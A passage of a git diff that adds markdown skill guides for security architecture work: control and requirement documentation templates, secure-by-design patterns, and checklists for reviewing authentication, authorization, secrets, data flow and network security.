**Examine**: Review ServiceNow account creation tickets, verify manager approval present for all requests in last 90 days + - Evidence: ServiceNow query results (`status=approved, created_date>90d`) + +2. **Interview**: Ask System Administrator: + - "How do you create new accounts?" + - "What happens if someone requests account without manager approval?" + - Expected answers: "ServiceNow enforces approval workflow, request cannot proceed without approval" + +3. **Test**: Attempt to create account without manager approval + - Procedure: Submit ServiceNow ticket, skip approval step + - Expected result: Request rejected with error "Manager approval required" + - Actual result: ✅ Request rejected (tested 2025-03-10) + +4. **Test**: Verify inactivity disablement + - Procedure: Create test account, wait 31 days without login, attempt login + - Expected result: Login fails with "Account disabled due to inactivity" + - Actual result: ✅ Account disabled (tested 2025-02-15) + +### Evidence Artifacts +- **Configuration**: `/infrastructure/terraform/iam-accounts.tf` +- **Logs**: + - Account creation: CloudWatch Log Group `/aws/servicenow/accounts`, query: `fields @timestamp, username, manager_approval_status | filter action="create"` + - Inactivity disablements: CloudWatch Log Group `/aws/lambda/account-lifecycle`, query: `fields @timestamp, username, reason | filter reason="inactivity_30d"` +- **Policy**: `/docs/account-management-policy-v2.1.pdf` (approved 2025-01-10) +- **Approval workflow**: ServiceNow workflow screenshot `/evidence/servicenow-account-approval-workflow.png` +- **Test results**: `/evidence/account-management-functional-tests-2025-Q1.pdf` + +### Compliance Mapping +- **NIST SP 800-53**: AC-2 (Account Management) + - AC-2(1): Automated account management + - AC-2(3): Disable inactive accounts +- **SOC2**: CC6.1 (Logical and physical access controls - Identifies and authenticates users) +- **ISO 27001**: A.9.2.1 (User registration and de-registration) +- 
**GDPR**: Article 32 (Security of processing - access control) +``` + +**Key elements**: +- Objective (WHY this control exists) +- Specific implementation (HOW it works, not vague) +- Assessment procedures (HOW to verify it works) +- Evidence locations (WHERE to find proof) +- Compliance mapping (WHAT frameworks this satisfies) + + +## Security Requirements + +### Pattern: Requirement with Traceability + +**Structure**: +```markdown +## Requirement: [ID] - [Title] + +### Requirement Statement +System SHALL [specific, testable requirement]. + +### Security Property +This requirement enforces: [Confidentiality / Integrity / Availability / Auditability] + +### Rationale +**Threat addressed**: [Threat ID or description] +**Risk without this**: [What happens if not implemented?] + +### Acceptance Criteria +- [ ] Criterion 1 (testable: "When X, expect Y") +- [ ] Criterion 2 +- [ ] Criterion 3 + +### Traceability +- **Threat**: [Threat ID] → This requirement mitigates [specific threat] +- **Control**: [Control ID] → Implemented by [control implementation] +- **Test**: [Test case ID] → Verified by [test procedure] + +### Implementation Reference +- Code: [File path and line numbers] +- Configuration: [Config file] +- Documentation: [Design doc] +``` + +### Example: MFA Requirement + +```markdown +## Requirement: SEC-101 - Multi-Factor Authentication for Privileged Accounts + +### Requirement Statement +System SHALL require multi-factor authentication (MFA) for all user accounts with administrative privileges. MFA SHALL use Time-Based One-Time Password (TOTP) or hardware token (not SMS). 
+ +### Security Property +This requirement enforces: **Confidentiality** and **Integrity** +- Prevents unauthorized access to privileged functions +- Reduces risk of account compromise via stolen passwords + +### Rationale +**Threat addressed**: Threat-012 (Credential theft and account takeover) +**Risk without this**: +- Attacker with stolen password can access admin functions +- Insider with compromised credentials can elevate privileges +- Impact: Complete system compromise, data breach + +**Regulatory requirement**: +- NIST SP 800-53 IA-2(1): Network access to privileged accounts requires MFA +- SOC2 CC6.1: Logical access requires multi-factor authentication for privileged access + +### Acceptance Criteria +- [ ] Admin account login requires password + TOTP code +- [ ] Login fails if TOTP code incorrect (tested: 3 incorrect attempts → account lockout) +- [ ] TOTP setup enforced at first admin login (cannot proceed without enabling MFA) +- [ ] SMS-based 2FA rejected (must be TOTP or hardware token) +- [ ] MFA cannot be disabled by user (only security admin can disable) + +### Traceability +- **Threat**: Threat-012 (Credential theft) → This requirement mitigates password-only auth vulnerability +- **Control**: IA-2(1) (Network access to privileged accounts) → Implemented by AWS IAM MFA enforcement + application-layer MFA check +- **Test**: TEST-SEC-101 → Verified by functional security test (attempt admin login without MFA → fails) + +### Implementation Reference +- **Code**: `src/auth/mfa-middleware.ts:45-78` (MFA enforcement logic) +- **Configuration**: `infrastructure/aws-iam-policy.json:12` (IAM policy requires MFA for admin role) +- **Documentation**: `/docs/adr-029-mfa-for-admins.md` (Security ADR documenting decision) +- **Evidence**: `/evidence/mfa-functional-test-2025-03.pdf` (Test results showing MFA enforcement) +``` + +**Key elements**: +- Specific, testable requirement (not vague "ensure security") +- Security property enforced +- 
Threat-to-requirement traceability +- Testable acceptance criteria +- Requirement-to-control-to-test traceability chain + + +## Quick Reference: Documentation Types + +| Document Type | Purpose | Key Elements | +|---------------|---------|--------------| +| **Threat Description** | Document attack scenarios | What/How/Who, affected assets, likelihood/impact, mitigations | +| **Security ADR** | Explain security architecture decisions | Threat model, decision, alternatives, residual risks, controls | +| **Control Description** | Document security control for audit | Objective, implementation, assessment procedures, evidence | +| **Security Requirement** | Specify testable security requirement | Requirement statement, threat traceability, acceptance criteria | + + +## Cross-References + +**Use WITH this skill**: +- `muna/technical-writer/documentation-structure` - Use ADR format, structure patterns +- `muna/technical-writer/clarity-and-style` - Write clear threat descriptions, avoid jargon +- `ordis/security-architect/threat-modeling` - Generate threat content for documentation +- `ordis/security-architect/security-controls-design` - Control designs to document + +**Use AFTER this skill**: +- `muna/technical-writer/documentation-testing` - Verify security docs are complete and accurate + +## Real-World Impact + +**Projects using threat-and-control documentation patterns**: +- **JWT Auth ADR**: Security review found 3 residual risks (key compromise, XSS, clock skew). Explicit risk acceptance by CISO enabled informed decision vs hidden risks. +- **SSP for Government System**: 421 control descriptions with assessment procedures + evidence locations. IRAP assessor completed assessment 40% faster vs SSPs without evidence locations ("clearest control documentation in 3 years"). +- **Threat-to-requirement traceability**: Security requirements traced to 47 threats. Penetration test found 2 HIGH findings. 
Traceability showed which threats weren't mitigated (vs scattered requirements with no threat context). + +**Key lesson**: **Security documentation with threat context + traceability enables verification and informed risk decisions. Vague "we're secure" documentation wastes auditor time and hides risks.** diff --git a/skills/using-security-architect/secure-by-design-patterns.md b/skills/using-security-architect/secure-by-design-patterns.md new file mode 100644 index 0000000..d875ebe --- /dev/null +++ b/skills/using-security-architect/secure-by-design-patterns.md @@ -0,0 +1,497 @@ + +# Secure By Design Patterns + +## Overview + +Build security into system foundations. Core principle: Design systems that are **secure by default, not secured after the fact**. + +**Key insight**: Preventing security issues through architecture is cheaper and more effective than detecting and responding to them. + +## When to Use + +Load this skill when: +- Designing new systems (greenfield) +- Refactoring existing architecture +- Making fundamental architecture decisions +- Evaluating architecture proposals + +**Symptoms you need this**: +- "How do we make this system secure?" +- Designing authentication, secrets management, data access +- Architecting microservices, data pipelines, distributed systems +- Choosing deployment/configuration strategies + +**Don't use for**: +- Threat modeling specific attacks (use `ordis/security-architect/threat-modeling`) +- Implementing security controls (use `ordis/security-architect/security-controls-design`) +- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`) + +## Core Patterns + +### Pattern 1: Zero-Trust Architecture + +**Principle**: Never trust, always verify. No implicit trust based on network location. + +#### Three Pillars + +1. 
**Verify Explicitly** + - Authenticate every request (no "internal network = trusted") + - Authorize based on identity + context (device, location, time, risk) + - Use strong authentication (mTLS, signed tokens, not IP allowlists alone) + +2. **Least Privilege Access** + - Grant minimum necessary permissions + - Time-limited access (credentials expire, tokens rotate) + - Resource-level authorization (not just service-level) + +3. **Assume Breach** + - Design for "when compromised", not "if compromised" + - Minimize blast radius (segmentation, isolation) + - Monitor everything (detect lateral movement) + +#### Example: Microservices Communication + +❌ **Not Zero-Trust**: +``` +Service A → Service B (same network, no auth) +# Assumes: Internal network = trusted +# Risk: Compromised service A can access all of service B +``` + +✅ **Zero-Trust**: +``` +Service A → Service B (mTLS + JWT + authz check) +# Every request authenticated + authorized +# Service B validates: Is this service A? Does it have permission for THIS resource? + +Implementation: +- Service mesh (Istio/Linkerd) enforces mTLS +- Service B validates JWT from service A +- RBAC policy: service A can only access /resource/{own_resources} +- Audit log: Record all access attempts +``` + +**Result**: If service A compromised, attacker cannot impersonate other services or access resources outside A's scope. + + +### Pattern 2: Immutable Infrastructure + +**Principle**: No runtime modifications. Replace rather than update. + +#### Core Concepts + +1. **Immutable Artifacts** + - Container images, VM images, binaries + - Never modified after creation + - Versioned and signed + +2. **Deployment Replaces Instances** + - Updates = deploy new version, terminate old + - No SSH into servers to patch + - No runtime configuration changes + +3. 
**Configuration as Code** + - All config in version control + - Deployments are reproducible + - Rollback = redeploy previous version + +#### Benefits + +- **Security**: No drift from known-good state +- **Auditability**: All changes in version control +- **Rollback**: Redeploy previous image +- **Consistency**: Dev/staging/prod identical + +#### Example: Application Updates + +❌ **Mutable (Insecure)**: +```bash +# SSH into production server +ssh prod-server + +# Update code +git pull origin main + +# Restart service +systemctl restart app + +# Problem: No audit trail, no rollback, config drift +``` + +✅ **Immutable (Secure)**: +```bash +# Build new image locally +docker build -t app:v2.1.0 . + +# Push to registry (signed) +docker push registry/app:v2.1.0 + +# Deploy new version (Kubernetes) +kubectl set image deployment/app app=registry/app:v2.1.0 + +# Kubernetes: Creates new pods, terminates old pods +# Rollback if needed: +kubectl rollout undo deployment/app + +# Result: Full audit trail, instant rollback, no drift +``` + +**Configuration Management**: +```yaml +# Configuration in Git, not edited on servers +apiVersion: v1 +kind: ConfigMap +metadata: + name: app-config +data: + API_TIMEOUT: "30" + RATE_LIMIT: "1000" + +# Changes = commit to Git → CI/CD applies → new deployment +``` + + +### Pattern 3: Security Boundaries + +**Principle**: Explicit trust zones with validation at every boundary crossing. + +#### Boundary Identification + +Trust boundaries are points where data/requests cross from lower-trust to higher-trust zones: + +``` +Internet (UNTRUSTED) + ↓ BOUNDARY 1 +API Gateway (TRUSTED) + ↓ BOUNDARY 2 +Application Services (TRUSTED) + ↓ BOUNDARY 3 +Database (HIGHLY TRUSTED) +``` + +#### Validation at Boundaries + +At EACH boundary: +1. **Authenticate**: Verify identity +2. **Authorize**: Check permissions +3. **Validate**: Check input format/constraints +4. **Sanitize**: Remove dangerous content +5. 
**Log**: Record crossing + +#### Example: Data Pipeline + +``` +External API (UNTRUSTED) + ↓ BOUNDARY: API Client + Validate: JSON schema, required fields + Authenticate: API key + Rate limit: 1000 req/hour + +Message Queue (SEMI-TRUSTED) + ↓ BOUNDARY: Consumer + Validate: Message structure, idempotency key + Authorize: Consumer has permission for this message type + +Processing Service (TRUSTED) + ↓ BOUNDARY: Database Writer + Validate: Data types, constraints + Authorize: Service can write to this table + +Database (HIGHLY TRUSTED) +``` + +**Key insight**: Never trust data just because it came from "internal" service. Validate at every boundary. + +#### Minimizing Boundary Surface Area + +❌ **Large Surface Area (Insecure)**: +``` +# Database accepts connections from all services +firewall: allow 0.0.0.0/0 → database:5432 + +# Problem: 50 services can connect, huge attack surface +``` + +✅ **Small Surface Area (Secure)**: +``` +# Only specific services connect to database +firewall: + allow backend-api → database:5432 + allow analytics → database:5432 + deny all others + +# Further: Use service mesh with identity-based policies +``` + + +### Pattern 4: Trusted Computing Base (TCB) Minimization + +**Principle**: Small security-critical core, everything else untrusted. + +#### What is TCB? + +TCB = Components you MUST trust for security. If TCB is compromised, security fails. + +**Goal**: Minimize TCB size (less code = fewer vulnerabilities). + +#### Pattern: Small Critical Core + +``` +┌─────────────────────────────────────┐ +│ Untrusted Zone (Applications) │ +│ - Web servers │ +│ - Application logic │ +│ - User-facing services │ +└────────────┬────────────────────────┘ + │ API calls (validated) +┌────────────▼────────────────────────┐ +│ TRUSTED COMPUTING BASE (TCB) │ +│ - Authentication service (small!) 
│ +│ - Secrets vault (minimal code) │ +│ - Audit logger (append-only) │ +└─────────────────────────────────────┘ +``` + +#### Example: Secrets Management + +❌ **Large TCB (Risky)**: +``` +# Every service has secrets management logic +# TCB = All 50+ services (huge attack surface) + +each_service: + - Fetches secrets from vault + - Decrypts secrets + - Manages rotation + - Handles caching + +# Problem: Bug in ANY service compromises secrets +``` + +✅ **Small TCB (Secure)**: +``` +# Secrets Vault = TCB (small, auditable, formally verified) +# Applications = Untrusted (use vault API) + +Vault (TCB): + - 10,000 lines of code + - Formally verified + - Hardware-backed encryption (HSM) + - Minimal attack surface (no network egress) + +Applications (Untrusted): + - Call vault API for secrets + - Vault enforces all access control + - Apps cannot access secrets they're not authorized for + +# Result: Compromise application ≠ compromise vault +``` + +#### TCB Characteristics + +1. **Small**: Minimize code size +2. **Auditable**: Can be formally verified +3. **Isolated**: Runs in separate environment (sandbox, separate machine) +4. **Minimal privileges**: TCB has no unnecessary access +5. **Heavily monitored**: All TCB access logged + + +### Pattern 5: Fail-Fast Security + +**Principle**: Validate security properties at construction time. Refuse to operate if misconfigured. + +#### Construction-Time vs Runtime + +**Construction time**: When system/component is created (startup, initialization) +**Runtime**: When system is processing requests + +**Fail-fast**: Validate security at construction, fail immediately if invalid. + +#### Example: Security Level Validation + +❌ **Runtime Validation (Vulnerable)**: +```python +# Data pipeline starts, processes data, THEN checks security +pipeline = Pipeline() +pipeline.add_source(untrusted_datasource) +pipeline.add_sink(trusted_datasink) +pipeline.start() # Starts processing! 
+ +# Runtime: Check if datasource security level matches sink +for record in pipeline: + if record.security_level > trusted_datasink.max_security_level: + raise SecurityError("Security mismatch!") + +# Problem: Exposed data before detecting mismatch +# Exposure window = time until first mismatched record +``` + +✅ **Fail-Fast (Secure)**: +```python +# Validate security BEFORE processing any data +pipeline = Pipeline() +pipeline.add_source(untrusted_datasource) +pipeline.add_sink(trusted_datasink) + +# BEFORE start: Validate security properties +if untrusted_datasource.security_level > trusted_datasink.max_security_level: + raise SecurityError( + f"Cannot create pipeline: Source {untrusted_datasource.security_level} " + f"exceeds sink maximum {trusted_datasink.max_security_level}" + ) + +pipeline.start() # Only starts if validation passed + +# Result: Zero exposure window, fail before processing data +``` + +#### Startup Validation Checklist + +Validate at system startup (fail if any check fails): +- [ ] All required secrets accessible? +- [ ] TLS certificates valid and not expired? +- [ ] Database permissions granted? +- [ ] Security policies loaded? +- [ ] Encryption keys available? 
+ +#### Example: Service Startup + +```python +class SecureService: + def __init__(self): + # Fail-fast validation at construction + self._validate_security() + + def _validate_security(self): + # Check TLS certificate + if not self.tls_cert_valid(): + raise SecurityError("TLS certificate invalid or expired") + + # Check encryption keys accessible + if not self.can_access_keys(): + raise SecurityError("Cannot access encryption keys") + + # Check database permissions + if not self.has_required_db_permissions(): + raise SecurityError("Insufficient database permissions") + + # All checks passed + logger.info("Security validation passed") + + def start(self): + # Only callable after __init__ validation passed + self.process_requests() + +# Usage: +try: + service = SecureService() # Validates security at construction + service.start() +except SecurityError as e: + logger.error(f"Service failed security validation: {e}") + sys.exit(1) # Refuse to start with invalid security +``` + +**Benefits**: +- **No exposure window**: Catch misconfigurations before processing data +- **Clear errors**: Fail with specific message ("TLS cert expired") +- **Operational safety**: Misconfigured systems never reach production + + +## Pattern Application Framework + +When designing systems, apply patterns in this order: + +### 1. Identify Trust Boundaries (Security Boundaries) +Where does data cross trust zones? + +### 2. Apply Zero-Trust at Each Boundary +- Authenticate + authorize every crossing +- Never trust based on network location + +### 3. Minimize TCB +What MUST be trusted? Can it be smaller? + +### 4. Use Immutable Infrastructure +Can deployments replace rather than update? + +### 5. 
Add Fail-Fast Validation +Validate security at construction, refuse to start if invalid + + +## Quick Reference: Pattern Selection + +| Situation | Pattern | Key Action | +|-----------|---------|------------| +| **Designing service-to-service communication** | Zero-Trust | mTLS + JWT + authz on every request | +| **Deciding deployment strategy** | Immutable Infrastructure | Container images, replace not update | +| **Architecting multi-tier system** | Security Boundaries | Validate + authenticate at every tier boundary | +| **Building secrets/auth service** | TCB Minimization | Small core, everything else uses API | +| **System startup logic** | Fail-Fast Security | Validate security before processing requests | + + +## Common Mistakes + +### ❌ Implicit Trust Based on Network + +**Wrong**: "Services in VPC are trusted, no auth needed" + +**Right**: Zero-trust - authenticate/authorize every request even within VPC + +**Why**: Network boundaries are weak. Compromised service = lateral movement without auth. + + +### ❌ Runtime Security Patches + +**Wrong**: SSH into production, apply patch, restart + +**Right**: Build new immutable image, deploy via CI/CD + +**Why**: Runtime patches create drift, no audit trail, hard to rollback. + + +### ❌ Large Security-Critical Core + +**Wrong**: Every service has secrets logic (large TCB) + +**Right**: Small secrets vault (TCB), services call API (untrusted) + +**Why**: Smaller TCB = fewer vulnerabilities, easier to audit/verify. + + +### ❌ Runtime Security Validation + +**Wrong**: Start processing, check security during execution + +**Right**: Validate security at construction, refuse to start if invalid + +**Why**: Runtime checks have exposure windows. Fail-fast = zero exposure. + + +### ❌ Unclear Trust Boundaries + +**Wrong**: No explicit boundaries, assume "internal is safe" + +**Right**: Diagram trust zones, validate at every boundary crossing + +**Why**: Boundaries are where attacks happen. 
Explicit validation prevents bypass. + + +## Cross-References + +**Use BEFORE this skill**: +- `ordis/security-architect/threat-modeling` - Identify threats, then apply patterns to address them + +**Use WITH this skill**: +- `ordis/security-architect/security-controls-design` - Patterns inform control choices + +**Use AFTER this skill**: +- `ordis/security-architect/security-architecture-review` - Review architecture against patterns + +## Real-World Impact + +**Systems using secure-by-design patterns:** +- **Zero-trust + immutable infrastructure**: No successful lateral movement in 2 years despite multiple compromised services (blast radius contained by mTLS + segmentation) +- **Fail-fast validation**: Prevented VULN-004 class (security level overrides) by refusing to start pipelines with mismatched security levels +- **TCB minimization**: Secrets vault with 8,000 lines of code (vs 50+ services with embedded secrets logic) - single formal verification point instead of 50 attack surfaces + +**Key lesson**: **Security built into architecture is more effective and cheaper than security added later.** diff --git a/skills/using-security-architect/security-architecture-review.md b/skills/using-security-architect/security-architecture-review.md new file mode 100644 index 0000000..48cd9af --- /dev/null +++ b/skills/using-security-architect/security-architecture-review.md @@ -0,0 +1,433 @@ + +# Security Architecture Review + +## Overview + +Systematically review designs for security issues. Core principle: **Checklist-driven review finds issues that intuition misses**. + +**Key insight**: Ad-hoc review finds obvious issues. Systematic checklist finds subtle gaps. + +## When to Use + +Load this skill when: +- Reviewing architecture designs pre-implementation +- Conducting security audits of existing systems +- Evaluating third-party integrations +- Pre-deployment security validation + +**Symptoms you need this**: +- "Is this design secure?" 
+- Reviewing microservices, APIs, data pipelines +- Pre-launch security check +- Compliance audit preparation + +**Don't use for**: +- Threat modeling new systems (use `ordis/security-architect/threat-modeling`) +- Designing controls (use `ordis/security-architect/security-controls-design`) +- Secure patterns (use `ordis/security-architect/secure-by-design-patterns`) + +## Review Process + +### Step 1: Understand System + +Before checklists, understand: +- **Components**: Services, databases, queues, external APIs +- **Data flows**: Where data enters/exits, trust boundaries +- **Users/actors**: Who accesses what (end users, admins, services) +- **Deployment**: Cloud/on-prem, network topology + +### Step 2: Apply Checklists + +For EACH area, go through checklist systematically. Check = verify present and secure. + +### Step 3: Document Findings + +For each issue found: +- **Description**: What's wrong +- **Severity**: Critical/High/Medium/Low +- **Impact**: What can attacker do +- **Recommendation**: How to fix + + +## Checklist 1: Authentication + +### Credential Storage +- [ ] Passwords hashed with strong algorithm (bcrypt, Argon2, scrypt) +- [ ] NOT hashed with weak algorithms (MD5, SHA1, plain SHA256) +- [ ] Salt used per-password (not global salt or no salt) +- [ ] Key derivation with sufficient iterations (bcrypt cost ≥12, Argon2 with recommended params) + +**Common Issues**: +- ❌ MD5/SHA1 hashing → CRITICAL +- ❌ No salt → HIGH +- ❌ Global salt → MEDIUM +- ❌ Low iteration count → MEDIUM + + +### Multi-Factor Authentication +- [ ] MFA available for all users (or at least admins) +- [ ] TOTP/hardware token support (not just SMS) +- [ ] Backup codes for account recovery +- [ ] Cannot bypass MFA via alternate login paths + +**Common Issues**: +- ❌ No MFA → HIGH (for privileged accounts) +- ❌ SMS-only 2FA → MEDIUM (SIM swapping risk) +- ❌ MFA bypass path exists → HIGH + + +### Session Management +- [ ] Session tokens have expiration (not indefinite) +- [ ] Token 
expiry reasonable (hours for web, days max for mobile) +- [ ] Token rotation on sensitive actions (password change, permission change) +- [ ] Logout invalidates tokens (server-side revocation) +- [ ] Tokens stored securely (HttpOnly, Secure cookies or secure storage) + +**Common Issues**: +- ❌ Non-expiring tokens → HIGH +- ❌ No logout/revocation → MEDIUM +- ❌ Tokens in localStorage (XSS vulnerable) → MEDIUM + + +### Password Policies +- [ ] Minimum length enforced (≥12 characters recommended) +- [ ] No maximum length (or very high max, ≥128 chars) +- [ ] Password history (prevent reuse of last N passwords) +- [ ] Account lockout after failed attempts (5-10 tries, temporary lockout) +- [ ] Common passwords rejected via blocklist (check against known-weak passwords) + +**Common Issues**: +- ❌ No password policy → MEDIUM +- ❌ Short max length (<20 chars) → LOW +- ❌ No lockout → MEDIUM (brute-force vulnerability) + + +## Checklist 2: Authorization + +### Access Control Model +- [ ] Clear access control model (RBAC, ABAC, MAC documented) +- [ ] Permissions defined per resource type +- [ ] Authorization checks at API layer AND data layer +- [ ] Consistent enforcement across all endpoints + +**Common Issues**: +- ❌ No defined model (ad-hoc checks) → HIGH +- ❌ Authorization only at API (not data layer) → MEDIUM +- ❌ Inconsistent (some endpoints skip checks) → HIGH + + +### Privilege Escalation Prevention +- [ ] Users cannot modify their own roles/permissions +- [ ] API doesn't trust client-provided role claims +- [ ] Admin actions require separate authentication/approval +- [ ] No hidden admin endpoints without authorization + +**Common Issues**: +- ❌ User can edit own role in profile → CRITICAL +- ❌ Trusting `X-User-Role` header from client → CRITICAL +- ❌ Hidden `/admin` path without authz → HIGH + + +### Resource-Level Authorization +- [ ] Authorization checks "Can THIS user access THIS resource?" +- [ ] Not just "Is user logged in?" or "Is user admin?" 
+- [ ] Users can only access their own data (unless explicitly shared) +- [ ] Object-level permission checks (IDOR prevention) + +**Common Issues**: +- ❌ Check login only, not resource ownership → HIGH (IDOR vulnerability) +- ❌ `/api/users/{user_id}` allows any authenticated user → HIGH + + +### Default-Deny Principle +- [ ] All endpoints require authentication by default +- [ ] Explicit allow-list for public endpoints +- [ ] Authorization failures return 403 Forbidden (not 404) +- [ ] No "development mode" backdoors in production + +**Common Issues**: +- ❌ Default-allow (must explicitly mark secure) → HIGH +- ❌ Returning 404 instead of 403 → LOW (information disclosure) +- ❌ Debug/dev endpoints enabled in production → CRITICAL + + +## Checklist 3: Secrets Management + +### Secrets Storage +- [ ] No secrets in source code +- [ ] No secrets in config files committed to Git +- [ ] No secrets in environment variables visible in UI +- [ ] Secrets stored in secrets manager (Vault, AWS Secrets Manager, etc.) 
+- [ ] Secrets encrypted at rest + +**Common Issues**: +- ❌ Secrets in Git history → CRITICAL +- ❌ Secrets in config.yaml → CRITICAL +- ❌ Database password in Dockerfile → HIGH + + +### Secrets Rotation +- [ ] Secrets have rotation schedule (monthly/quarterly) +- [ ] Rotation is automated or documented +- [ ] Application supports zero-downtime rotation +- [ ] Old secrets revoked after rotation + +**Common Issues**: +- ❌ No rotation policy → MEDIUM +- ❌ Manual rotation without documentation → LOW +- ❌ Rotation requires downtime → LOW + + +### Access Control to Secrets +- [ ] Secrets access restricted by service identity +- [ ] Least privilege (service accesses only its secrets) +- [ ] Audit log of secrets access +- [ ] No shared secrets across services + +**Common Issues**: +- ❌ All services can access all secrets → MEDIUM +- ❌ No audit log → LOW +- ❌ Shared API key for multiple services → MEDIUM + + +## Checklist 4: Data Flow + +### Trust Boundary Identification +- [ ] Trust boundaries documented (external → API → services → database) +- [ ] Each boundary has validation rules +- [ ] No implicit trust based on network location + +**Common Issues**: +- ❌ No documented boundaries → MEDIUM +- ❌ "Internal network = trusted" assumption → HIGH + + +### Input Validation at Boundaries +- [ ] All external input validated (type, format, range) +- [ ] Validation at EVERY trust boundary (not just entry point) +- [ ] Allow-list validation (define what's allowed, reject rest) +- [ ] Input validation errors logged + +**Common Issues**: +- ❌ No validation at internal boundaries → MEDIUM +- ❌ Deny-list only (blacklist can be bypassed) → MEDIUM +- ❌ Validation at UI only (not API) → HIGH + + +### Output Encoding for Context +- [ ] Output encoded for destination context (HTML, SQL, shell, etc.) 
+- [ ] SQL parameterized queries (no string concatenation) +- [ ] HTML escaped when rendering user data +- [ ] JSON encoded when returning API responses + +**Common Issues**: +- ❌ String concatenation for SQL → CRITICAL (SQL injection) +- ❌ Unescaped HTML → HIGH (XSS) +- ❌ Unescaped shell commands → CRITICAL (command injection) + + +### Data Classification and Handling +- [ ] Sensitive data identified (PII, secrets, financial) +- [ ] Sensitive data encrypted in transit +- [ ] Sensitive data encrypted at rest +- [ ] Sensitive data not logged +- [ ] Data retention policy defined + +**Common Issues**: +- ❌ PII in plaintext logs → HIGH +- ❌ No encryption for sensitive data → HIGH +- ❌ No data retention policy → MEDIUM + + +## Checklist 5: Network Security + +### TLS/Encryption in Transit +- [ ] All external traffic uses TLS (HTTPS, not HTTP) +- [ ] TLS 1.2 or 1.3 only (TLS 1.0/1.1 disabled) +- [ ] Strong cipher suites (no RC4, 3DES, MD5) +- [ ] HSTS header present (HTTP Strict Transport Security) + +**Common Issues**: +- ❌ HTTP allowed → CRITICAL +- ❌ TLS 1.0 enabled → HIGH +- ❌ Weak ciphers → MEDIUM +- ❌ No HSTS → LOW + + +### Certificate Validation +- [ ] TLS certificates validated (not self-signed in production) +- [ ] Certificate expiry monitored +- [ ] Certificate revocation checking (OCSP/CRL) +- [ ] No certificate validation bypass in code + +**Common Issues**: +- ❌ Self-signed certs in production → HIGH +- ❌ `verify=False` in code → CRITICAL +- ❌ No expiry monitoring → MEDIUM + + +### Network Segmentation +- [ ] Database not directly accessible from internet +- [ ] Services in separate subnets/VPCs +- [ ] Admin interfaces on separate network +- [ ] Internal services use mTLS or VPN + +**Common Issues**: +- ❌ Database exposed to internet → CRITICAL +- ❌ All services in same flat network → MEDIUM +- ❌ Admin panel on public internet → HIGH + + +### Firewall Rules and Least-Necessary Access +- [ ] Firewall rules documented +- [ ] Default-deny firewall policy +- [ ] 
Only necessary ports open +- [ ] Source IP restrictions for sensitive endpoints + +**Common Issues**: +- ❌ Default-allow firewall → HIGH +- ❌ All ports open → MEDIUM +- ❌ No source restrictions → MEDIUM + + +## Severity Guidelines + +Use these guidelines to assign severity: + +### Critical +- Direct path to data breach or system compromise +- **Examples**: SQL injection, secrets in Git, authentication bypass + +### High +- Significant security impact, requires immediate attention +- **Examples**: Weak password hashing, no MFA for admins, IDOR vulnerability + +### Medium +- Security weakness that should be addressed +- **Examples**: No password policy, inconsistent authorization, no audit logging + +### Low +- Minor issue or hardening opportunity +- **Examples**: Information disclosure via error messages, missing HSTS header + + +## Review Report Template + +```markdown +# Security Architecture Review + +**System**: [System Name] +**Review Date**: [Date] +**Reviewer**: [Name] + +## Executive Summary + +[1-2 paragraph overview: Critical/High count, key findings, overall risk level] + +## Findings + +### Critical (Count: X) + +#### 1. [Finding Title] +- **Area**: Authentication / Authorization / Secrets / Data Flow / Network +- **Description**: [What's wrong] +- **Impact**: [What attacker can do] +- **Recommendation**: [How to fix] +- **Affected Components**: [API Service, Database, etc.] + +### High (Count: X) + +[Same format as Critical] + +### Medium (Count: X) + +[Same format] + +### Low (Count: X) + +[Same format] + +## Summary Table + +| Finding | Severity | Area | Status | +|---------|----------|------|--------| +| SQL injection in /api/users | Critical | Data Flow | Open | +| Secrets in Git | Critical | Secrets | Open | +| No MFA for admins | High | Authentication | Open | + +## Next Steps + +1. Address Critical findings immediately (timeline: 1 week) +2. Address High findings (timeline: 2-4 weeks) +3. 
Schedule Medium/Low findings (timeline: 1-3 months) +``` + + +## Quick Reference: Checklist Summary + +| Area | Key Checks | +|------|------------| +| **Authentication** | Strong hashing (bcrypt), MFA, token expiry, lockout policy | +| **Authorization** | RBAC/ABAC model, resource-level checks, default-deny, no privilege escalation | +| **Secrets** | Not in Git, secrets manager, rotation policy, access control | +| **Data Flow** | Trust boundaries, input validation, output encoding, data classification | +| **Network** | TLS 1.2+, certificate validation, segmentation, firewall rules | + + +## Common Mistakes + +### ❌ Ad-Hoc Review Without Checklist + +**Wrong**: Review design intuitively, find obvious issues, call it done + +**Right**: Systematically go through all 5 checklists, check every item + +**Why**: Intuition finds 50% of issues. Checklist finds 90%. + + +### ❌ Stopping After Finding First Issues + +**Wrong**: Find SQL injection, report it, stop review + +**Right**: Complete full checklist review even after finding critical issues + +**Why**: Systems often have multiple unrelated vulnerabilities. + + +### ❌ Vague Recommendations + +**Wrong**: "Improve authentication security" + +**Right**: "Replace MD5 with bcrypt (cost factor 12), add salt per-password" + +**Why**: Specific recommendations are actionable. Vague ones are ignored. + + +### ❌ Missing Severity Assignment + +**Wrong**: List issues without severity + +**Right**: Assign Critical/High/Medium/Low to prioritize fixes + +**Why**: Teams need to know what to fix first. 
+ + +## Cross-References + +**Use BEFORE this skill**: +- `ordis/security-architect/threat-modeling` - Understand threats, then review if design addresses them + +**Use WITH this skill**: +- `muna/technical-writer/documentation-structure` - Document review as ADR or report + +**Use AFTER this skill**: +- `ordis/security-architect/security-controls-design` - Design fixes for identified issues + +## Real-World Impact + +**Systematic reviews using these checklists:** +- **Pre-launch review caught SQL injection** in `/api/users/{id}` endpoint (would have been CRITICAL production vulnerability) +- **Checklist found secrets in Git history** across 3 repositories (developers missed it in manual review) +- **Authorization review found 12 IDOR vulnerabilities** where `/api/orders/{order_id}` didn't check ownership (intuitive review found only 2) + +**Key lesson**: **Systematic checklist review finds 3-5x more issues than ad-hoc intuitive review.** diff --git a/skills/using-security-architect/security-authorization-and-accreditation.md b/skills/using-security-architect/security-authorization-and-accreditation.md new file mode 100644 index 0000000..4770330 --- /dev/null +++ b/skills/using-security-architect/security-authorization-and-accreditation.md @@ -0,0 +1,757 @@ + +# Security Authorization and Accreditation + +## Overview + +Navigate government/defense security authorization processes. Core principle: **Authorization is risk acceptance by an official with authority**. + +**Key insight**: ATO is not a checklist - it's formal risk acceptance documentation enabling informed decision-making by leadership. + +## When to Use + +Load this skill when: +- Deploying systems for government/defense +- Preparing for ATO (Authority to Operate) +- Connecting to classified networks +- Formal security testing and evaluation + +**Symptoms you need this**: +- "How do I get ATO for production?" 